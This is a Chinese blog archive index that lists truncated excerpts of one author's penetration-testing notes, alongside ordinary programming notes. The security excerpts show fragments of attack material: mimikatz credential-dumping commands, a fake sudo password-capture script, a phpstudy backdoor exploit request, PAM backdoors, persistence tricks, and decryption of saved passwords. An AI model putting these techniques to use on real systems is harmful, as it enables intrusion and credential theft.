11 2022 档案

摘要:Windows RPC 探测出网(MS-RPRN协议) 参考链接 https://github.com/Rvn0xsy/SchtaskCreator https://payloads.online/archivers/2022-03-04/1/ 通过Windows RPC批量寻找“出网”机器 实现目 阅读全文
posted @ 2022-11-27 20:30 是谁走漏了消息 阅读(410) 评论(0) 推荐(0) 编辑
摘要:Windows RPC 计划任务(MS-TSCH协议) 参考链接 https://github.com/Rvn0xsy/SchtaskCreator 实现目标 上一篇文章实现了自己调用自己编写的rpc接口,达到了远程调用的效果。 本篇目标尝试调用windows系统自身的rpc接口,实现在本地机器和远 阅读全文
posted @ 2022-11-27 20:28 是谁走漏了消息 阅读(976) 评论(0) 推荐(0) 编辑
摘要:Windows RPC 远程过程调用 初探 参考资料 https://bbs.pediy.com/thread-262291.htm Windows RPC 远程过程调用 初理解 RPC简单理解 RPC(Remote procedure call 远程过程调用),一种通过网络从远程计算机上请求服务, 阅读全文
posted @ 2022-11-22 22:29 是谁走漏了消息 阅读(542) 评论(0) 推荐(0) 编辑
摘要:icmpsh改进 原项目 https://github.com/bdamele/icmpsh 改进后项目 https://github.com/1457716957/icmpsh 改进点 1. 通信进行了aes_ctr加密(包括传输内容和下发指令) 2. 伪装了windows下的正常通信 正常通信的 阅读全文
posted @ 2022-11-21 21:41 是谁走漏了消息 阅读(39) 评论(0) 推荐(0) 编辑
摘要:wordpress相关工具 wpscan https://github.com/wpscanteam/wpscan https://wpvulndb.com/users/choose_plan 注册api-token docker pull wpscanteam/wpscan docker安装 常用 阅读全文
posted @ 2022-11-20 22:08 是谁走漏了消息 阅读(37) 评论(0) 推荐(0) 编辑
摘要:responder使用 Options: --version show program's version number and exit -h, --help show this help message and exit -A, --analyze Analyze mode. This opti 阅读全文
posted @ 2022-11-20 22:07 是谁走漏了消息 阅读(93) 评论(0) 推荐(0) 编辑
摘要:shodan使用 city: 城市,貌似只支持英文,而且不是能是简称,如,TOKYO,Hong Kong,Seoul... country: 指定国家或地区后缀,比如:cn,us,jp,tw,br,ph,vn,hk... hostname: 指定主机名,其实就是目标域名[域名如果是子域还需要在前面加 阅读全文
posted @ 2022-11-20 22:07 是谁走漏了消息 阅读(245) 评论(0) 推荐(0) 编辑
摘要:nmap使用 参考资料:https://klionsec.github.io/page/10/ 使用 # nmap -v 192.168.3.240 扫描某单个目标[目标可以是域名,ip后者ip段] # nmap -iL ip.txt 同时扫描多个目标,把目标的ip/ip段事先放在一个文件中,每行对 阅读全文
posted @ 2022-11-20 22:06 是谁走漏了消息 阅读(21) 评论(0) 推荐(0) 编辑
摘要:mimikatz使用 一、获取密码 privilege::debug``sekurlsa::logonpasswords``mimikatz.exe ``"sekurlsa::debug"` `"sekurlsa::logonPasswords full"` `>>1.txt ``exit 一般我会 阅读全文
posted @ 2022-11-20 22:05 是谁走漏了消息 阅读(195) 评论(0) 推荐(0) 编辑
摘要:masscan使用 参考资料:https://klionsec.github.io/page/10/ github地址 https://github.com/robertdavidgraham/masscan masscan 常用选项: -p 指定要扫描的端口,同时指定多个端口要用逗号隔开 --ra 阅读全文
posted @ 2022-11-20 22:03 是谁走漏了消息 阅读(688) 评论(0) 推荐(0) 编辑
摘要:hydra 参数说明 -R 从上次未完成的爆破文件[hydra.restore]中读取爆破进度并接着上次的进度继续往后爆破 -S 爆破https时需要加上该选项 -s 如果要爆破的服务用的不是默认端口,可以用这个来手工指定服务端口号 -l/-L 指定用户名 / 指定用户名字典文件 -p/-P 指定密 阅读全文
posted @ 2022-11-20 22:02 是谁走漏了消息 阅读(128) 评论(0) 推荐(0) 编辑
摘要:google使用 基础过滤器 intitle: 从网页标题中搜索指定的关键字,可专门用来搜索指定版本名称的各类web程序,也可用allintitle inurl: 从url中搜索指定的关键字,可专门用来构造各种形式的漏洞url,也可用allinurl intext: 从网页中搜索指定的关键字,经常会 阅读全文
posted @ 2022-11-20 22:00 是谁走漏了消息 阅读(180) 评论(0) 推荐(0) 编辑
摘要:hashcat 参考资料 https://blog.bbskali.cn/1635.html hashcat -m 1000 -a 0 -o winpass1.txt --remove win2.hash ptemp.txt 参数说明: “-m 1000” 表示破解密码类型为“NTLM”; “-a 阅读全文
posted @ 2022-11-20 22:00 是谁走漏了消息 阅读(178) 评论(0) 推荐(0) 编辑
摘要:frp 基础 下载地址:https://github.com/fatedier/frp/releases wget https://github.com/fatedier/frp/releases/download/v0.34.0/frp_0.34.0_linux_amd64.tar.gz 服务端: 阅读全文
posted @ 2022-11-20 21:57 是谁走漏了消息 阅读(66) 评论(0) 推荐(0) 编辑
摘要:Bttercap 参考连接 https://blog.csdn.net/weixin_41489908/article/details/118572751 https://blog.csdn.net/qq_44881113/article/details/119898952 https://blog 阅读全文
posted @ 2022-11-20 21:54 是谁走漏了消息 阅读(28) 评论(0) 推荐(0) 编辑
摘要:使用记录 参考资料 https://xz.aliyun.com/t/3007 得到会话,上传文件 upload /root/360rd.exe c:/ProgramData 大小写 # 上传文件到目标机上 执行exe execute #在目标机中执行文件 execute -H -f cmd.exe 阅读全文
posted @ 2022-11-20 21:50 是谁走漏了消息 阅读(81) 评论(0) 推荐(0) 编辑
摘要:SQLmap使用手册 参考连接 https://www.tr0y.wang/2018/03/21/sqlmap-guide/#SQLmap-%E4%BB%8B%E7%BB%8D SQLmap 介绍 什么是 SQLmap Sqlmap 是由 Python 写成的,开源的自动化 SQL 注入工具 特点 阅读全文
posted @ 2022-11-20 21:46 是谁走漏了消息 阅读(561) 评论(0) 推荐(0) 编辑
摘要:phpmyadmin getshell 参考链接 https://xz.aliyun.com/t/3283#toc-8 1.直接写webshell 1.查看 secure_file_priv SHOW VARIABLES LIKE "secure_file_priv"; 当你尝试执行select i 阅读全文
posted @ 2022-11-20 21:41 是谁走漏了消息 阅读(112) 评论(0) 推荐(0) 编辑
摘要:mssql 参考连接 https://www.cnblogs.com/shellr00t/p/5310187.html https://fuping.site/2017/05/16/MSSQL-DBA-Permission-GET-WEBSHELL/ 1.报错注入: 【1】首先爆版本:http:// 阅读全文
posted @ 2022-11-20 21:37 是谁走漏了消息 阅读(47) 评论(0) 推荐(0) 编辑
摘要:mysql基础注入知识 参考资料: https://pureqh.top/?p=1882 bypass安全狗 常用函数 ascii() length() substr() # 左闭右闭 hex() isnull() # isnull+load_file可以扫描判断文件名是否存在 cancat(0x7 阅读全文
posted @ 2022-11-20 21:31 是谁走漏了消息 阅读(23) 评论(0) 推荐(0) 编辑
摘要:Spring Boot Actuator(eureka xstream deserialization RCE) 参考资料: https://www.jianshu.com/p/91a5ca9b7c1c 本文的大部分步骤 https://github.com/LandGrey/SpringBootV 阅读全文
posted @ 2022-11-20 21:27 是谁走漏了消息 阅读(114) 评论(0) 推荐(0) 编辑
摘要:xhell6解密脚本 import hashlib import base64 string = "nt authority\system S-1-5-18" # ######## sha256 ######## sha256 = hashlib.sha256() sha256.update(str 阅读全文
posted @ 2022-11-20 21:14 是谁走漏了消息 阅读(33) 评论(0) 推荐(0) 编辑
摘要:简单linux-sudo密码劫持脚本 #!/bin/bash swhoami=`whoami` if [[ ! -f "/tmp/..." ]]; then swhoami=`whoami` read -s -p "[sudo] password for $swhoami: " passwd ech 阅读全文
posted @ 2022-11-20 21:12 是谁走漏了消息 阅读(109) 评论(0) 推荐(0) 编辑
摘要:thinkphp漏洞 参考资料:https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection 敏感信息 THINKPHP3.2 结构:Application\Runtime\Logs\Home\16_09_09.log THINKPHP3 阅读全文
posted @ 2022-11-20 21:10 是谁走漏了消息 阅读(189) 评论(0) 推荐(0) 编辑
摘要:python版nbtscan # -*- coding:utf-8 -*- import socket import sys from datetime import datetime # import threading import time import ipaddress # 识别ip段模块 阅读全文
posted @ 2022-11-20 21:09 是谁走漏了消息 阅读(128) 评论(0) 推荐(0) 编辑
摘要:ping实现 实现一 # encoding:utf-8 import time import struct import socket import select import sys def chesksum(data): n=len(data) m=n % 2 sum=0 for i in ra 阅读全文
posted @ 2022-11-20 21:08 是谁走漏了消息 阅读(31) 评论(0) 推荐(0) 编辑
摘要:phpstudy后门 exp GET /index.php HTTP/1.1 Host: 127.0.0.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; 阅读全文
posted @ 2022-11-20 21:05 是谁走漏了消息 阅读(59) 评论(0) 推荐(0) 编辑
摘要:golang接收文件脚本 package main import ( "io" "os" "fmt" "io/ioutil" "net/http" ) // https://www.jianshu.com/p/b49cc19d26f0 参考资料 func uploadHandler(w http.R 阅读全文
posted @ 2022-11-20 21:03 是谁走漏了消息 阅读(56) 评论(0) 推荐(0) 编辑
摘要:av识别脚本 # /usr/bin/env python # _*_ coding:utf-8 _*_ # author: smelond av_exe = ("1433.exe", "360leakfixer.exe", "360rp.exe", "360RP.exe", "360safe.exe 阅读全文
posted @ 2022-11-20 21:00 是谁走漏了消息 阅读(425) 评论(0) 推荐(0) 编辑
摘要:源码包扫描 # import requests import subprocess import os, re from urllib.parse import urlparse from multiprocessing.pool import ThreadPool pool = ThreadPoo 阅读全文
posted @ 2022-11-20 20:58 是谁走漏了消息 阅读(18) 评论(0) 推荐(0) 编辑
摘要:烂番茄 利用条件 域内存在任意一台域控和域功能级别是server 2012及以上时,可以通过给所在机器配置"msDS-AllowedToActOnBehalfOfOtherIdentity"属性来设置rbcd,然后通过s4u协议申请高权限票据进行利用 exp using System; using 阅读全文
posted @ 2022-11-20 20:55 是谁走漏了消息 阅读(124) 评论(0) 推荐(0) 编辑
摘要:禅道 参考资料 https://blog.csdn.net/qq_29678299/article/details/109987739 搭建 官方地址 https://www.zentao.net/index.html 开源版本下载 https://www.zentao.net/download/z 阅读全文
posted @ 2022-11-20 20:52 是谁走漏了消息 阅读(35) 评论(0) 推荐(0) 编辑
摘要:宝塔利用 删除宝塔中的登陆日志 import sqlite3 import argparse def log(id): conn = sqlite3.connect('default.db') c = conn.cursor() c.execute("DELETE from logs where I 阅读全文
posted @ 2022-11-20 20:51 是谁走漏了消息 阅读(16) 评论(0) 推荐(0) 编辑
摘要:tmux 最简操作流程 1.tmux new -s my_session 新建会话tmux new -s my_session 2.Ctrl+b d 按下快捷键Ctrl+b d将会话分离 3.tmux attach -t my_session (tmux attach-session -t my_s 阅读全文
posted @ 2022-11-20 20:44 是谁走漏了消息 阅读(149) 评论(0) 推荐(0) 编辑
摘要:Shell学习 参考资料:https://www.runoob.com/linux/linux-shell-variable.html 变量 变量的命名规则和其他语言基本一样 your_name="qinjx" echo $your_name echo ${your_name} 推荐使用带花括号的 阅读全文
posted @ 2022-11-20 20:43 是谁走漏了消息 阅读(17) 评论(0) 推荐(0) 编辑
摘要:redis安装 参考资料 https://www.cnblogs.com/-mo-/p/11487797.html 简单安装 ########################## ubuntu安装 #################################### $sudo apt-get 阅读全文
posted @ 2022-11-20 20:41 是谁走漏了消息 阅读(22) 评论(0) 推荐(0) 编辑
摘要:elk搭建 参考资料: https://www.cnblogs.com/adawoo/p/11665532.html jdk安装 https://www.cnblogs.com/cheesebar/p/9126171.html elk安装 1. 关闭防火墙和selinux systemctl sto 阅读全文
posted @ 2022-11-20 20:34 是谁走漏了消息 阅读(29) 评论(0) 推荐(0) 编辑
摘要:docker操作笔记 https://www.runoob.com/docker/docker-container-usage.html 菜鸟教程 安装 使用官方安装脚本自动安装 安装命令如下: curl -fsSL https://get.docker.com | bash -s docker - 阅读全文
posted @ 2022-11-20 20:29 是谁走漏了消息 阅读(18) 评论(0) 推荐(0) 编辑
摘要:php笔记 参考资料 https://zeo.cool/2020/12/31/webshell%E5%A4%9A%E7%A7%8D%E6%96%B9%E6%B3%95%E5%85%8D%E6%9D%80/ https://h3art3ars.github.io/2020/02/27/%E5%88%A 阅读全文
posted @ 2022-11-20 20:23 是谁走漏了消息 阅读(27) 评论(0) 推荐(0) 编辑
摘要:威盾解密 单个文件解密 <?php $filename=$_GET['f'];//要解密的文件 $lines = file($filename);//0,1,2行 //第一次base64解密 $content=""; if(preg_match("/O0O0000O0\('.*'\)/",$line 阅读全文
posted @ 2022-11-20 20:12 是谁走漏了消息 阅读(167) 评论(0) 推荐(0) 编辑
摘要:python time模块记录 参考链接: https://www.runoob.com/python/python-date-time.html 13位时间戳转换 import time # 输入毫秒级的时间,转出正常格式的时间 def timeStamp(timeNum): timeStamp 阅读全文
posted @ 2022-11-20 20:06 是谁走漏了消息 阅读(17) 评论(0) 推荐(0) 编辑
摘要:tg机器人 tg机器人官方api文档 https://core.telegram.org/bots/api#getfile 实例代码 import requests, json, time, os class my_reboot(): def __init__(self): self.token = 阅读全文
posted @ 2022-11-20 20:03 是谁走漏了消息 阅读(550) 评论(0) 推荐(0) 编辑
摘要:subprocess笔记 ''' https://www.runoob.com/w3cnote/python3-subprocess.html 常用参数: args:shell命令,可以是字符串或者序列类型(如:list,元组) bufsize:缓冲区大小。当创建标准流的管道对象时使用,默认-1。 阅读全文
posted @ 2022-11-20 20:01 是谁走漏了消息 阅读(23) 评论(0) 推荐(0) 编辑
摘要:qqwry-py3使用记录 项目地址:https://github.com/animalize/qqwry-python3 说明 其实主要的是 qqwry.py文件和qqwry.dat 模块的其他详细使用参考项目地址 用法 from qqwry import QQwry q = QQwry() q. 阅读全文
posted @ 2022-11-20 19:58 是谁走漏了消息 阅读(410) 评论(0) 推荐(0) 编辑
摘要:pywin32-自动点击脚本 参考资料: https://nymrli.top/2018/08/31/python-win32api-win32gui-win32con-PyUserInput%E5%AE%9E%E7%8E%B0%E8%87%AA%E5%8A%A8%E5%8C%96%E8%84%9A 阅读全文
posted @ 2022-11-20 17:00 是谁走漏了消息 阅读(155) 评论(0) 推荐(0) 编辑
摘要:pandas记录 ''' 资料 https://www.cnblogs.com/insane-Mr-Li/p/13231644.html https://blog.csdn.net/toshibahuai/article/details/79034829 ''' # encoding='utf-8' 阅读全文
posted @ 2022-11-20 16:58 是谁走漏了消息 阅读(12) 评论(0) 推荐(0) 编辑
摘要:BeautifulSoup模块 参考资料:https://www.cnblogs.com/hanmk/p/8724162.html 安装 pip install beautifulsoup4 基本使用 from bs4 import BeautifulSoup import requests url 阅读全文
posted @ 2022-11-20 16:55 是谁走漏了消息 阅读(14) 评论(0) 推荐(0) 编辑
摘要:base64 参考资料 https://blog.csdn.net/m0_37422289/article/details/82753260 str1 = "this is string example....wow!!!" # str3 转成bytes 的string str3 = str1.en 阅读全文
posted @ 2022-11-20 16:53 是谁走漏了消息 阅读(35) 评论(0) 推荐(0) 编辑
摘要:asyncio记录 参考资料如下: http://www.langzi.fun/Python%E5%8D%8F%E7%A8%8B.html 各种例子 https://www.cnblogs.com/cwp-bg/p/9590700.html async函数的各个方法 https://www.jian 阅读全文
posted @ 2022-11-20 16:50 是谁走漏了消息 阅读(42) 评论(0) 推荐(0) 编辑
摘要:AES_加密模块 参考连接 https://mp.weixin.qq.com/s?__biz=MzIwNDI1NjUxMg==&mid=2651262030&idx=1&sn=9fe47330bad26de7b5025a812aff476d&chksm=8d314821ba46c1375ca4eda 阅读全文
posted @ 2022-11-20 16:45 是谁走漏了消息 阅读(65) 评论(0) 推荐(0) 编辑
摘要:常用代码 re正则 ((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})(\.((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})){3} # 匹配ip https://www.jianshu.com/p/82886d77440c result = re.find 阅读全文
posted @ 2022-11-20 16:37 是谁走漏了消息 阅读(21) 评论(0) 推荐(0) 编辑
摘要:后门-pam认证 参考资料 https://www.cnblogs.com/adhzl/p/12098397.html https://www.cnblogs.com/-qing-/p/13178917.html https://www.jianshu.com/p/4bd5ce0f5894 # Li 阅读全文
posted @ 2022-11-20 16:33 是谁走漏了消息 阅读(123) 评论(0) 推荐(0) 编辑
摘要:bypass-php-FastCGI PHPFPM 参考资料: https://www.anquanke.com/post/id/197745#h3-5 PHP 突破 disable_functions 常用姿势以及使用 Fuzz 挖掘含内部系统调用的函数 https://www.leavesong 阅读全文
posted @ 2022-11-20 16:30 是谁走漏了消息 阅读(52) 评论(0) 推荐(0) 编辑
摘要:root权限-维持技巧 参考链接: https://github.com/422926799/note/blob/master/%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/Linux%E6%8F%90%E6%9D%83/%E4%BD%BF%E7%94%A8%E5%8A% 阅读全文
posted @ 2022-11-20 16:24 是谁走漏了消息 阅读(46) 评论(0) 推荐(0) 编辑
摘要:MobaXterm密码解密 快速说明(本地解密未成功) 1. 需要配置文件(或注册表信息,hostname,net user) 2. python3环境, 需要安装 pycryptodome 3. 解密失败的因素怀疑是master password(这款软件不仅会加密密码,其中master pasw 阅读全文
posted @ 2022-11-20 16:17 是谁走漏了消息 阅读(5495) 评论(1) 推荐(0) 编辑
摘要:Xmanager密码解密 (Xshell Xftp 基本一样) 快速说明(实测wind7 Xshell密码解密) 1. 需要whoami 和 配置文件 1. `只能在window机器上解密`,因为要安装pypiwin32, pycryptodome 2. python3环境 步骤一 获得目标sid 阅读全文
posted @ 2022-11-20 16:07 是谁走漏了消息 阅读(812) 评论(0) 推荐(0) 编辑
摘要:基础-ntds.dit拖取 参考资料 https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E8%8E%B7%E5%BE%97%E5%9F%9F%E6%8E%A7%E6%9C%8D%E5%8A%A1% 阅读全文
posted @ 2022-11-20 15:22 是谁走漏了消息 阅读(224) 评论(0) 推荐(0) 编辑
摘要:利用Masterkey离线导出Chrome浏览器中保存的密码 快速说明 需要浏览器Login Data文件 和 lsass进程的内存文件 步骤一 获得目标Login Data copy %LocalAppData%\Google\Chrome\User Data\Default\Login Data 阅读全文
posted @ 2022-11-20 14:57 是谁走漏了消息 阅读(1146) 评论(0) 推荐(0) 编辑
摘要:手机号段抓取脚本 #! -*- coding:utf-8 -*- import requests from multiprocessing.pool import ThreadPool from lxml import etree # 取消验证警告 from requests.packages.ur 阅读全文
posted @ 2022-11-20 14:36 是谁走漏了消息 阅读(111) 评论(0) 推荐(0) 编辑
摘要:wifi工具使用 1.aircrack-ng iwconfig #查看无线网卡 sudo airmon-ng #查看网卡是否支持监听模式 sudo airmon-ng check kill #结束系统中可能的干扰进程 sudo airmon-ng start wlan0 #开启监听模式 sudo a 阅读全文
posted @ 2022-11-20 14:11 是谁走漏了消息 阅读(199) 评论(0) 推荐(0) 编辑